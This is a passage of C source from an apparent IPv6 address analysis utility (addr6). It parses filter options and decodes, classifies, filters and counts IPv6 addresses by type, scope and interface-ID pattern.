privileges (changing to real UID)"); exit(EXIT_FAILURE); } } else{ if((pwdptr=getpwnam("nobody"))){ if(pwdptr->pw_uid && (setgid(pwdptr->pw_gid) == -1)){ puts("Error while releasing superuser privileges (changing to nobody's group)"); exit(EXIT_FAILURE); } if(pwdptr->pw_uid && (setuid(pwdptr->pw_uid) == -1)){ puts("Error while releasing superuser privileges (changing to 'nobody')"); exit(EXIT_FAILURE); } } } while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'a': if( inet_pton(AF_INET6, optarg, &(addr.ip6)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } addr_f=1; break; case 'i': /* Read from stdin */ stdin_f=1; break; case 'd': /* Decode IPv6 addresses */ decode_f=1; break; case 'j': /* IPv6 Address (accept) filter */ if(naccept > MAX_ACCEPT){ puts("Too many IPv6 Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Address (accept) filter number %u.\n", naccept+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &accept[naccept]) <= 0){ printf("Error in IPv6 Address (accept) filter number %u.\n", naccept+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ acceptlen[naccept] = 128; } else{ acceptlen[naccept] = atoi(charptr); if(acceptlen[naccept]>128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", naccept+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&accept[naccept], acceptlen[naccept]); naccept++; acceptfilters_f=1; filter_f=1; break; case 'J': /* IPv6 Address (block) filter */ if(nblock >= MAX_BLOCK){ puts("Too many IPv6 Source Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Address (block) filter number %u.\n", nblock+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &block[nblock]) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", nblock+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ blocklen[nblock] = 128; } else{ blocklen[nblock] = atoi(charptr); if(blocklen[nblock]>128){ printf("Length error in IPv6 Address (block) filter number %u.\n", nblock+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&block[nblock], blocklen[nblock]); nblock++; filter_f=1; break; case 'b': /* Accept type filter */ if(strncmp(optarg, "unicast", MAX_TYPE_SIZE) == 0){ accept_type |= IPV6_UNICAST; } else if(strncmp(optarg, "unspec", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "unspecified", MAX_TYPE_SIZE) == 0){ accept_type |= IPV6_UNSPEC; } else if(strncmp(optarg, "multicast", MAX_TYPE_SIZE) == 0){ accept_type |= IPV6_MULTICAST; } else{ printf("Unknown address type '%s' in accept type filter\n", optarg); exit(EXIT_FAILURE); } acceptfilters_f=1; filter_f=1; break; case 'B': /* Block type filter */ if(strncmp(optarg, "unicast", MAX_TYPE_SIZE) == 0){ block_type |= IPV6_UNICAST; } else if(strncmp(optarg, "unspec", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "unspecified", MAX_TYPE_SIZE) == 0){ block_type |= IPV6_UNSPEC; } else if(strncmp(optarg, "multicast", MAX_TYPE_SIZE) == 0){ block_type |= IPV6_MULTICAST; } else{ printf("Unknown address type '%s' in block type filter\n", optarg); exit(EXIT_FAILURE); } filter_f=1; break; case 'k': /* Accept scope filter */ if(strncmp(optarg, "reserved", MAX_TYPE_SIZE) == 0){ accept_scope |= SCOPE_RESERVED; } else if(strncmp(optarg, "interface", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "interface-local", MAX_TYPE_SIZE) == 0){ accept_type |= SCOPE_INTERFACE; } else if(strncmp(optarg, "link", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "link-local", MAX_TYPE_SIZE) == 0){ accept_type |= SCOPE_LINK; } else if(strncmp(optarg, "admin", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "admin-local", MAX_TYPE_SIZE) == 0){ accept_type |= SCOPE_ADMIN; } else if(strncmp(optarg, "site", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "site-local", MAX_TYPE_SIZE) == 0){ accept_type |= SCOPE_SITE; } else if(strncmp(optarg, "organization", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "organization-local", MAX_TYPE_SIZE) == 0){ accept_type |= SCOPE_ORGANIZATION; } else if(strncmp(optarg, "global", MAX_TYPE_SIZE) == 0){ accept_type |= SCOPE_GLOBAL; } else if(strncmp(optarg, "unassigned", MAX_TYPE_SIZE) == 0){ accept_type |= SCOPE_UNASSIGNED; } else if(strncmp(optarg, "unspecified", MAX_TYPE_SIZE) == 0){ accept_type |= SCOPE_UNSPECIFIED; } else{ printf("Unknown address scope '%s' in accept scope filter\n", optarg); exit(EXIT_FAILURE); } acceptfilters_f=1; filter_f=1; break; case 'K': /* Block scope filter */ if(strncmp(optarg, "reserved", MAX_TYPE_SIZE) == 0){ block_scope |= SCOPE_RESERVED; } else if(strncmp(optarg, "interface", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "interface-local", MAX_TYPE_SIZE) == 0){ block_type |= SCOPE_INTERFACE; } else if(strncmp(optarg, "link", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "link-local", MAX_TYPE_SIZE) == 0){ block_type |= SCOPE_LINK; } else if(strncmp(optarg, "admin", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "admin-local", MAX_TYPE_SIZE) == 0){ block_type |= SCOPE_ADMIN; } else if(strncmp(optarg, "site", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "site-local", MAX_TYPE_SIZE) == 0){ block_type |= SCOPE_SITE; } else if(strncmp(optarg, "organization", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "organization-local", MAX_TYPE_SIZE) == 0){ block_type |= SCOPE_ORGANIZATION; } else if(strncmp(optarg, "global", MAX_TYPE_SIZE) == 0){ block_type |= SCOPE_GLOBAL; } else if(strncmp(optarg, "unassigned", MAX_TYPE_SIZE) == 0){ block_type |= SCOPE_UNASSIGNED; } else if(strncmp(optarg, "unspecified", MAX_TYPE_SIZE) == 0){ block_type |= SCOPE_UNSPECIFIED; } else{ printf("Unknown address scope '%s' in block scope filter\n", optarg); exit(EXIT_FAILURE); } filter_f=1; break; case 'w': /* Accept unicast type filter */ if(strncmp(optarg, "loopback", MAX_TYPE_SIZE) == 0){ accept_utype |= UCAST_LOOPBACK; } else if(strncmp(optarg, "ipv4-compat", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "ipv4-compatible", MAX_TYPE_SIZE) == 0){ accept_utype |= UCAST_V4COMPAT; } else if(strncmp(optarg, "ipv4-mapped", MAX_TYPE_SIZE) == 0){ accept_utype |= UCAST_V4MAPPED; } else if(strncmp(optarg, "link-local", MAX_TYPE_SIZE) == 0){ accept_utype |= UCAST_LINKLOCAL; } else if(strncmp(optarg, "site-local", MAX_TYPE_SIZE) == 0){ accept_utype |= UCAST_SITELOCAL; } else if(strncmp(optarg, "unique-local", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "ula", MAX_TYPE_SIZE) == 0){ accept_utype |= UCAST_UNIQUELOCAL; } else if(strncmp(optarg, "6to4", MAX_TYPE_SIZE) == 0){ accept_utype |= UCAST_6TO4; } else if(strncmp(optarg, "teredo", MAX_TYPE_SIZE) == 0){ accept_utype |= UCAST_TEREDO; } else if(strncmp(optarg, "global", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "normal", MAX_TYPE_SIZE) == 0){ accept_utype |= UCAST_GLOBAL; } else{ printf("Unknown unicast address type '%s' in accept unicast address type filter\n", optarg); exit(EXIT_FAILURE); } acceptfilters_f=1; filter_f=1; break; case 'W': /* Block unicast type filter */ if(strncmp(optarg, "loopback", MAX_TYPE_SIZE) == 0){ block_utype |= UCAST_LOOPBACK; } else if(strncmp(optarg, "ipv4-compat", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "ipv4-compatible", MAX_TYPE_SIZE) == 0){ block_utype |= UCAST_V4COMPAT; } else if(strncmp(optarg, "ipv4-mapped", MAX_TYPE_SIZE) == 0){ block_utype |= UCAST_V4MAPPED; } else if(strncmp(optarg, "link-local", MAX_TYPE_SIZE) == 0){ block_utype |= UCAST_LINKLOCAL; } else if(strncmp(optarg, "site-local", MAX_TYPE_SIZE) == 0){ block_utype |= UCAST_SITELOCAL; } else if(strncmp(optarg, "unique-local", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "ula", MAX_TYPE_SIZE) == 0){ block_utype |= UCAST_UNIQUELOCAL; } else if(strncmp(optarg, "6to4", MAX_TYPE_SIZE) == 0){ block_utype |= UCAST_6TO4; } else if(strncmp(optarg, "teredo", MAX_TYPE_SIZE) == 0){ block_utype |= UCAST_TEREDO; } else if(strncmp(optarg, "global", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "normal", MAX_TYPE_SIZE) == 0){ block_utype |= UCAST_GLOBAL; } else{ printf("Unknown unicast address type '%s' in block unicast address type filter\n", optarg); exit(EXIT_FAILURE); } filter_f=1; break; case 'g': /* Accept IID filter */ if(strncmp(optarg, "ieee", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_MACDERIVED; } else if(strncmp(optarg, "isatap", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "ISATAP", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_ISATAP; } else if(strncmp(optarg, "ipv4-32", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_EMBEDDEDIPV4; } else if(strncmp(optarg, "ipv4-64", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_EMBEDDEDIPV4_64; } else if(strncmp(optarg, "ipv4-all", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_EMBEDDEDIPV4; accept_itype |= IID_EMBEDDEDIPV4_64; } else if(strncmp(optarg, "embed-port", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "port", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_EMBEDDEDPORT; } else if(strncmp(optarg, "embed-port-rev", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "port-rev", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_EMBEDDEDPORTREV; } else if(strncmp(optarg, "embed-port-all", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "port-all", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_EMBEDDEDPORT; accept_itype |= IID_EMBEDDEDPORTREV; } else if(strncmp(optarg, "low-byte", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "lowbyte", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_LOWBYTE; } else if(strncmp(optarg, "byte-pattern", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "bytepattern", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_PATTERN_BYTES; } else if(strncmp(optarg, "random", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "randomized", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_RANDOM; } else{ printf("Unknown IID type '%s' in accept IID type filter.\n", optarg); exit(EXIT_FAILURE); } acceptfilters_f=1; filter_f = 1; break; case 'G': /* Block IID filter */ if(strncmp(optarg, "ieee", MAX_TYPE_SIZE) == 0){ block_itype |= IID_MACDERIVED; } else if(strncmp(optarg, "isatap", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "ISATAP", MAX_TYPE_SIZE) == 0){ block_itype |= IID_ISATAP; } else if(strncmp(optarg, "ipv4-32", MAX_TYPE_SIZE) == 0){ block_itype |= IID_EMBEDDEDIPV4; } else if(strncmp(optarg, "ipv4-64", MAX_TYPE_SIZE) == 0){ block_itype |= IID_EMBEDDEDIPV4_64; } else if(strncmp(optarg, "ipv4-all", MAX_TYPE_SIZE) == 0){ block_itype |= IID_EMBEDDEDIPV4; block_itype |= IID_EMBEDDEDIPV4_64; } else if(strncmp(optarg, "embed-port", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "port", MAX_TYPE_SIZE) == 0){ block_itype |= IID_EMBEDDEDPORT; } else if(strncmp(optarg, "embed-port-rev", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "port-rev", MAX_TYPE_SIZE) == 0){ block_itype |= IID_EMBEDDEDPORTREV; } else if(strncmp(optarg, "embed-port-all", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "port-all", MAX_TYPE_SIZE) == 0){ block_itype |= IID_EMBEDDEDPORT; block_itype |= IID_EMBEDDEDPORTREV; } else if(strncmp(optarg, "low-byte", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "lowbyte", MAX_TYPE_SIZE) == 0){ block_itype |= IID_LOWBYTE; } else if(strncmp(optarg, "byte-pattern", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "bytepattern", MAX_TYPE_SIZE) == 0){ block_itype |= IID_PATTERN_BYTES; } else if(strncmp(optarg, "random", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "randomized", MAX_TYPE_SIZE) == 0){ block_itype |= IID_RANDOM; } else{ printf("Unknown IID type '%s' in block IID type filter.\n", optarg); exit(EXIT_FAILURE); } filter_f = 1; break; case 's': /* Generate IPv6 Address Statistics */ stats_f = 1; break; case 'q': /* Filter duplicate addresses */ print_unique_f = 1; break; case 'v': /* Be verbose */ verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(stdin_f && addr_f){ puts("Cannot specify both '-a' and '-s' at the same time (try only one of them at a time)"); exit(EXIT_FAILURE); } if(!stdin_f && !addr_f){ puts("Must specify an IPv6 address with '-a', or set '-s' to read addresses from stdin"); exit(EXIT_FAILURE); } if(stats_f && !stdin_f){ puts("Cannot obtain statistics based on a single IPv6 address (should be using '-i')"); exit(EXIT_FAILURE); } /* By default, addr6 decodes IPv6 addresses */ if(!print_unique_f && !filter_f && !stats_f) decode_f=1; if(print_unique_f){ if(!init_host_list(&hlist)){ puts("Not enough memory when initializing internal host list"); exit(EXIT_FAILURE); } } if(stats_f){ memset(&stats, 0, sizeof(stats)); } if(stdin_f){ while(fgets(line, MAX_LINE_SIZE, stdin) != NULL){ r= read_prefix(line, Strnlen(line, MAX_LINE_SIZE), &ptr); if(r==1){ if ( inet_pton(AF_INET6, ptr, &(addr.ip6)) <= 0){ if(decode_f) puts("Error: Invalid IPv6 address"); continue; } if(filter_f || decode_f || stats_f) decode_ipv6_address(&addr, &stats); if(nblock){ if(match_ipv6(block, blocklen, nblock, &(addr.ip6))){ continue; } } if(block_type || block_scope || block_itype || block_utype){ if( (block_type & addr.type) || (block_utype & addr.subtype)\ || (block_scope & addr.scope) || (block_itype & addr.iidtype)) continue; } accepted_f=0; if(naccept){ if(match_ipv6(accept, acceptlen, naccept, &(addr.ip6))) accepted_f= 1; } if(!accepted_f && (accept_type || accept_scope || accept_itype || accept_utype)){ if( (accept_type & addr.type) || (accept_utype & addr.subtype)\ || (accept_scope & addr.scope) || (accept_itype & addr.iidtype)) accepted_f=1; } if(acceptfilters_f && !accepted_f) continue; if(print_unique_f){ if(is_ip6_in_list(&hlist, &(addr.ip6))){ continue; } else{ if(add_host_entry(&hlist, &(addr.ip6)) == NULL){ puts("Not enough memory (or hit internal artificial limit) when storing IPv6 address in memory"); exit(EXIT_FAILURE); } } } if(stats_f){ stat_ipv6_address(&addr, &stats); } else if(decode_f){ print_dec_address_script(&addr); } else{ if(inet_ntop(AF_INET6, &(addr.ip6), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 address to presentation format"); exit(EXIT_FAILURE); } printf("%s\n", pv6addr); } } } if(stats_f){ print_stats(&stats); } } else{ /* If we were not asked to decode the address, we should print it on stdout */ if(decode_f){ decode_ipv6_address(&addr, &stats); print_dec_address_script(&addr); } } exit(EXIT_SUCCESS); } /* * Function: read_prefix() * * Obtain a pointer to the beginning of non-blank text, and zero-terminate that text upon space or comment. */ int read_prefix(char *line, unsigned int len, char **start){ char *end; *start=line; while( (*start < (line + len)) && (**start==' ' || **start=='\t' || **start=='\r' || **start=='\n')){ (*start)++; } if( *start == (line + len)) return(0); if( **start == '#') return(0); end= *start; while( (end < (line + len)) && !(*end==' ' || *end=='\t' || *end=='#' || *end=='\r' || *end=='\n')) end++; *end=0; return(1); } /* * Function: is_service_port() * * Check whether a short int is in the list of service ports (in hexadecmal or decimal "notations") */ unsigned int is_service_port(u_int16_t port){ unsigned int i; u_int16_t service_ports_hex[]={0x21, 0x22, 0x23, 0x25, 0x49, 0x53, 0x80, 0x110, 0x123, 0x179, 0x220, 0x389, \ 0x443, 0x547, 0x993, 0x995, 0x1194, 0x3306, 0x5060, 0x5061, 0x5432, 0x6446, 0x8080}; u_int16_t service_ports_dec[]={21, 22, 23, 25, 49, 53, 80, 110, 123, 179, 220, 389, \ 443, 547, 993, 995, 1194, 3306, 5060, 5061, 5432, 6446, 8080}; for(i=0; i< (sizeof(service_ports_hex)/sizeof(u_int16_t)); i++){ if(port == service_ports_hex[i]) return(1); } for(i=0; i< (sizeof(service_ports_hex)/sizeof(u_int16_t)); i++){ if(port == service_ports_dec[i]) return(1); } return(0); } /* * Function: zero_byte_iid() * * Counts the number of zero-bytes in an IPv6 Interface ID */ unsigned int zero_byte_iid(struct in6_addr *ipv6){ unsigned int i, nonzero=0; for(i=8; i<=15; i++){ if(ipv6->s6_addr[i] == 0) nonzero++; } return(nonzero); } /* * Function: decode_ipv6_address() * * Decodes/analyzes an IPv6 address */ void decode_ipv6_address(struct decode6 *addr, struct stats6 *stats){ u_int16_t scope; if(IN6_IS_ADDR_UNSPECIFIED(&(addr->ip6))){ addr->type= IPV6_UNSPEC; addr->subtype= IPV6_UNSPEC; addr->scope= SCOPE_UNSPECIFIED; } else if(IN6_IS_ADDR_MULTICAST(&(addr->ip6))){ addr->type= IPV6_MULTICAST; addr->iidtype= IID_UNSPECIFIED; addr->iidsubtype= IID_UNSPECIFIED; if((addr->ip6.s6_addr16[0] & htons(0xff00)) == htons(0xff00)){ if((addr->ip6.s6_addr16[0] & htons(0xfff0)) == htons(0xff00)){ addr->subtype= MCAST_PERMANENT; } else if((addr->ip6.s6_addr16[0] & htons(0xfff0)) == htons(0xff10)){ addr->subtype= MCAST_NONPERMANENT; } else if((addr->ip6.s6_addr16[0] & htons(0xfff0)) == htons(0xff20)){ addr->subtype= MCAST_INVALID; } else if((addr->ip6.s6_addr16[0] & htons(0xfff0)) == htons(0xff30)){ addr->subtype= MCAST_UNICASTBASED; } else if((addr->ip6.s6_addr16[0] & htons(0xfff0)) == htons(0xff40)){ addr->subtype= MCAST_INVALID; } else if((addr->ip6.s6_addr16[0] & htons(0xfff0)) == htons(0xff50)){ addr->subtype= MCAST_INVALID; } else if((addr->ip6.s6_addr16[0] & htons(0xfff0)) == htons(0xff60)){ addr->subtype= MCAST_INVALID; } else if((addr->ip6.s6_addr16[0] & htons(0xfff0)) == htons(0xff70)){ addr->subtype= MCAST_EMBEDRP; } scope= htons(addr->ip6.s6_addr16[0]) & 0x000f; switch(scope){ case 0: addr->scope= SCOPE_RESERVED; break; case 1: addr->scope= SCOPE_INTERFACE; break; case 2: addr->scope= SCOPE_LINK; break; case 3: addr->scope= SCOPE_RESERVED; break; case 4: addr->scope= SCOPE_ADMIN; break; case 5: addr->scope= SCOPE_SITE; break; case 8: addr->scope= SCOPE_ORGANIZATION; break; case 0Xe: addr->scope= SCOPE_GLOBAL; break; default: addr->scope= SCOPE_UNASSIGNED; break; } } else{ addr->subtype= MCAST_UNKNOWN; } } else{ addr->type= IPV6_UNICAST; addr->iidtype= IID_UNSPECIFIED; addr->iidsubtype= IID_UNSPECIFIED; if(IN6_IS_ADDR_LOOPBACK(&(addr->ip6))){ addr->subtype= UCAST_LOOPBACK; addr->scope= SCOPE_INTERFACE; } else if(IN6_IS_ADDR_V4MAPPED(&(addr->ip6))){ addr->subtype= UCAST_V4MAPPED; addr->scope= SCOPE_UNSPECIFIED; } else if(IN6_IS_ADDR_V4COMPAT(&(addr->ip6))){ addr->subtype= UCAST_V4COMPAT; addr->scope= SCOPE_UNSPECIFIED; } else if(IN6_IS_ADDR_LINKLOCAL(&(addr->ip6))){ addr->subtype= UCAST_LINKLOCAL; addr->scope= SCOPE_LINK; } else if(IN6_IS_ADDR_SITELOCAL(&(addr->ip6))){ addr->subtype= UCAST_SITELOCAL; addr->scope= SCOPE_SITE; } else if(IN6_IS_ADDR_UNIQUELOCAL(&(addr->ip6))){ addr->subtype= UCAST_UNIQUELOCAL; addr->scope= SCOPE_GLOBAL; } else if(IN6_IS_ADDR_6TO4(&(addr->ip6))){ addr->subtype= UCAST_6TO4; addr->scope= SCOPE_GLOBAL; } else if(IN6_IS_ADDR_TEREDO(&(addr->ip6)) || IN6_IS_ADDR_TEREDO_LEGACY(&(addr->ip6))){ addr->subtype= UCAST_TEREDO; addr->scope= SCOPE_GLOBAL; /* If the U or G bytes are set, the IID type is unknown */ if(ntohs(addr->ip6.s6_addr16[4]) & 0x0300){ addr->iidtype= IID_TEREDO_UNKNOWN; } else if(ntohs(addr->ip6.s6_addr16[4]) & 0x3cff){ addr->iidtype= IID_TEREDO_RFC5991; } else{ addr->iidtype= IID_TEREDO_RFC4380; } } else{ addr->subtype= UCAST_GLOBAL; addr->scope= SCOPE_GLOBAL; } if(addr->subtype==UCAST_GLOBAL || addr->subtype==UCAST_V4MAPPED || addr->subtype==UCAST_V4COMPAT || \ addr->subtype==UCAST_LINKLOCAL || addr->subtype==UCAST_SITELOCAL || addr->subtype==UCAST_UNIQUELOCAL ||\ addr->subtype == UCAST_6TO4){ if( (addr->ip6.s6_addr32[2] & htonl(0x020000ff)) == htonl(0x020000ff) && (addr->ip6.s6_addr32[3] & htonl(0xff000000)) == htonl(0xfe000000)){ addr->iidtype= IID_MACDERIVED; addr->iidsubtype= (ntohl(addr->ip6.s6_addr32[2]) >> 8) & 0xfffdffff; } else if((addr->ip6.s6_addr32[2] & htonl(0xfdffffff)) == htonl(0x00005efe)){ /* We assume the u bit can be o o 1, but the i/g bit must be 0 */ addr->iidtype= IID_ISATAP; } else if(addr->ip6.s6_addr32[2] == 0 && (addr->ip6.s6_addr16[6] & htons(0xff00)) != 0 && addr->ip6.s6_addr16[7] != 0){ addr->iidtype= IID_EMBEDDEDIPV4; } else if(addr->ip6.s6_addr32[2] == 0 && \ ((addr->ip6.s6_addr16[6] & htons(0xff00)) == 0 && is_service_port(ntohs(addr->ip6.s6_addr16[7])))){ addr->iidtype= IID_EMBEDDEDPORT; } else if(addr->ip6.s6_addr32[2] == 0 && \ ((addr->ip6.s6_addr16[7] & htons(0xff00)) == 0 && is_service_port(ntohs(addr->ip6.s6_addr16[6])))){ addr->iidtype= IID_EMBEDDEDPORTREV; } else if(addr->ip6.s6_addr32[2] == 0 && (addr->ip6.s6_addr16[6] & htons(0xff00)) == 0 && addr->ip6.s6_addr16[7] != 0){ addr->iidtype= IID_LOWBYTE; } else if( ntohs(addr->ip6.s6_addr16[4]) <= 0x255 && ntohs(addr->ip6.s6_addr16[5]) <= 0x255 && \ ntohs(addr->ip6.s6_addr16[6]) <= 0x255 && ntohs(addr->ip6.s6_addr16[7]) <= 0x255){ addr->iidtype= IID_EMBEDDEDIPV4_64; } else if( zero_byte_iid(&(addr->ip6)) > 2 ){ addr->iidtype= IID_PATTERN_BYTES; } else{ addr->iidtype= IID_RANDOM; } } } } /* * Function: stat_ipv6_address() * * Incorporate address in IPv6 address statistics */ void stat_ipv6_address(struct decode6 *addr, struct stats6 *stats){ (stats->total)++; switch(addr->type){ case IPV6_UNSPEC: (stats->ipv6unspecified)++; break; case IPV6_MULTICAST: (stats->ipv6multicast)++; switch(addr->subtype){ case MCAST_PERMANENT: (stats->mcastpermanent)++; break; case MCAST_NONPERMANENT: (stats->mcastnonpermanent)++; break; case MCAST_INVALID: (stats->mcastinvalid)++; break; case MCAST_UNICASTBASED: (stats->mcastunicastbased)++; break; case MCAST_EMBEDRP: (stats->mcastembedrp)++; break; case MCAST_UNKNOWN: (stats->mcastunknown)++; break; } if(addr->subtype != MCAST_UNKNOWN){ switch(addr->scope){ case SCOPE_RESERVED: (stats->mscopereserved)++; break; case SCOPE_INTERFACE: (stats->mscopeinterface)++; break; case SCOPE_LINK: (stats->mnscopelink)++; break; case SCOPE_ADMIN: (stats->mscopeadmin)++; break; case SCOPE_SITE: (stats->mscopesite)++; break; case SCOPE_ORGANIZATION: (stats->mscopeorganization)++; break; case SCOPE_GLOBAL: (stats->mscopeglobal)++; break; case SCOPE_UNASSIGNED: (stats->mscopeunassigned)++; break; } } break; case IPV6_UNICAST: (stats->ipv6unicast)++; switch(addr->subtype){ case UCAST_LOOPBACK: (stats->ucastloopback)++; break; case UCAST_V4MAPPED: (stats->ucastv4mapped)++; break; case UCAST_V4COMPAT: (stats->ucastv4compat)++; break; case UCAST_LINKLOCAL: (stats->ucastlinklocal)++; break; case UCAST_SITELOCAL: (stats->ucastsitelocal)++; break; case UCAST_UNIQUELOCAL: (stats->ucastuniquelocal)++; break; case UCAST_6TO4: (stats->ucast6to4)++; break; case UCAST_TEREDO: (stats->ucastteredo)++; break; case UCAST_GLOBAL: (stats->ucastglobal)++; break; } if(addr->subtype==UCAST_GLOBAL || addr->subtype==UCAST_V4MAPPED || addr->subtype==UCAST_V4COMPAT || \ addr->subtype==UCAST_LINKLOCAL || addr->subtype==UCAST_SITELOCAL || addr->subtype==UCAST_UNIQUELOCAL ||\ addr->subtype == UCAST_6TO4){ switch(addr->iidtype){ case IID_MACDERIVED: (stats->iidmacderived)++; break; case IID_ISATAP: (stats->iidisatap)++; break; case IID_EMBEDDEDIPV4: (stats->iidmbeddedipv4)++; break; case IID_EMBEDDEDPORT: (stats->iidembeddedport)++; break; case IID_EMBEDDEDPORTREV: (stats->iidembeddedportrev)++; break; case IID_LOWBYTE: (stats->iidlowbyte)++; break; case IID_EMBEDDEDIPV4_64: (stats->iidembeddedipv4_64)++; break; case IID_PATTERN_BYTES: (stats->iidpatternbytes)++; break; case IID_RANDOM: (stats->iidrandom)++; break; } } break; } } /* * Function: print_dec_address_script() * * Print the IPv6 address decode obtained by decode_ipv6_address */ void print_dec_address_script(struct decode6 *addr){ unsigned int r; char *nullstring=""; char *unspecified="unspecified"; char iidsubtypebuffer[9]; char *ipv6unspec="unspecified"; char *ipv6multicast="multicast"; char *ipv6unicast="unicast"; char *ucastloopback="loopback"; char *ucastv4mapped="ipv4-mapped"; char *ucastv4compat="ipv4-compatible"; char *ucastlinklocal="link-local"; char *ucastsitelocal="site-local"; char *ucastuniquelocal="unique-local"; char *ucast6to4="6to4"; char *ucastteredo="teredo"; char *ucastglobal="global"; char *mcastpermanent="permanent"; char *mcastnonpermanent="non-permanent"; char *mcastinvalid="invalid"; char *mcastunicastbased="unicast-based"; char *mcastembedrp="embedded-rp"; char *mcastunknown="unknown"; char *iidmacderived="ieee-derived"; char *iidisatap="isatap"; char *iidmbeddedipv4="embedded-ipv4"; char *iidembeddedport="embedded-port"; char *iidembeddedportrev="embedded-port-rev"; char *iidlowbyte="low-byte"; char *iidembeddedipv4_64="embedded-ipv4-64"; char *iidpatternbytes="pattern-bytes"; char *iidrandom="randomized"; char *iidteredorfc4380="rfc4380"; char *iidteredorfc5991="rfc5991"; char *iidteredounknown="unknown"; char *scopereserved="reserved"; char *scopeinterface="interface"; char *scopelink="link"; char *scopeadmin="admin"; char *scopesite="site"; char *scopeorganization="organization"; char *scopeglobal="global"; char *scopeunassigned="unassigned"; char *scopeunspecified="unspecified"; char *type, *subtype, *scope, *iidtype, *iidsubtype; type= nullstring; subtype= nullstring; iidtype= nullstring; iidsubtype= nullstring; switch(addr->type){ case IPV6_UNSPEC: type= ipv6unspec; subtype= unspecified; iidtype= unspecified; iidsubtype=unspecified; break; case IPV6_UNICAST: type= ipv6unicast; iidtype= unspecified; iidsubtype=unspecified; switch(addr->subtype){ case UCAST_LOOPBACK: subtype= ucastloopback; iidtype= iidlowbyte; break; case UCAST_GLOBAL: subtype= ucastglobal; break; case UCAST_V4MAPPED: subtype= ucastv4mapped; break; case UCAST_V4COMPAT: subtype= ucastv4compat; break; case UCAST_LINKLOCAL: subtype= ucastlinklocal; break; case UCAST_SITELOCAL: subtype= ucastsitelocal; break; case UCAST_UNIQUELOCAL: subtype= ucastuniquelocal; break; case UCAST_6TO4: subtype= ucast6to4; break; case UCAST_TEREDO: subtype= ucastteredo; break; } if(addr->subtype == UCAST_GLOBAL || addr->subtype == UCAST_V4MAPPED || addr->subtype == UCAST_V4COMPAT || \ addr->subtype == UCAST_LINKLOCAL || addr->subtype == UCAST_SITELOCAL || addr->subtype == UCAST_UNIQUELOCAL ||\ addr->subtype == UCAST_6TO4 || addr->subtype == UCAST_TEREDO){ switch(addr->iidtype){ case IID_MACDERIVED: iidtype= iidmacderived; iidsubtype= iidsubtypebuffer; r=snprintf(iidsubtypebuffer, sizeof(iidsubtypebuffer), "%02x-%02x-%02x", (addr->iidsubtype >> 16 & 0xff), (addr->iidsubtype >> 8 & 0xff), (addr->iidsubtype & 0xff)); if(r == 8) iidsubtype= iidsubtypebuffer; break; case IID_ISATAP: iidtype= iidisatap; break; case IID_EMBEDDEDIPV4: iidtype= iidmbeddedipv4; break; case IID_EMBEDDEDPORT: iidtype= iidembeddedport; break; case IID_EMBEDDEDPORTREV: iidtype= iidembeddedportrev; break; case IID_LOWBYTE: iidtype= iidlowbyte; break; case IID_EMBEDDEDIPV4_64: iidtype= iidembeddedipv4_64; break; case IID_PATTERN_BYTES: iidtype= iidpatternbytes; break; case IID_RANDOM: iidtype= iidrandom; break; case IID_TEREDO_RFC4380: 